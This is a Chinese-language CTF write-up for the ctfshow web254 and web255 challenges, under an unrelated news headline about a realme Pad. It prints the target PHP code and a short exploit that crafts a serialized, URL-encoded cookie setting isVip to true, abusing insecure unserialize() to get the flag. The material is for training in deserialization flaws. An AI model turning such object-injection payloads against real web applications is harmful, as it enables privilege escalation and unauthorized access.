realme Pad 實拍圖曝光,將在印度釋出
阿新 • • 發佈:2021-09-08
web254
直接get傳參就行了
username=xxxxxx&password=xxxxx
web255
拿到程式碼
<?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-02 17:44:47 # @Last Modified by: h1xa # @Last Modified time: 2020-12-02 19:29:02 # @email: [email protected] # @link: https://ctfer.com */ error_reporting(0); highlight_file(__FILE__); include('flag.php'); class ctfShowUser{ public $username='xxxxxx'; public $password='xxxxxx'; public $isVip=false; public function checkVip(){ return $this->isVip; } public function login($u,$p){ return $this->username===$u&&$this->password===$p; } public function vipOneKeyGetFlag(){ if($this->isVip){ global $flag; echo "your flag is ".$flag; }else{ echo "no vip, no flag"; } } } $username=$_GET['username']; $password=$_GET['password']; if(isset($username) && isset($password)){ $user = unserialize($_COOKIE['user']); if($user->login($username,$password)){ if($user->checkVip()){ $user->vipOneKeyGetFlag(); } }else{ echo "no vip,no flag"; } }
首先get傳參,進入第一個if語句,接著對cookie值進行了反序列化,在cookie中構造序列化
exp
<?php class ctfShowUser { public $username = 'xxxxxx'; public $password = 'xxxxxx'; public $isVip = true; } $a = new ctfShowUser(); $b = urlencode(serialize($a)); echo $b; ?>
需要特別注意的是在cookie欄位當中需要url編碼一波)(其名稱以及儲存的字串值是必須經過URL編碼的)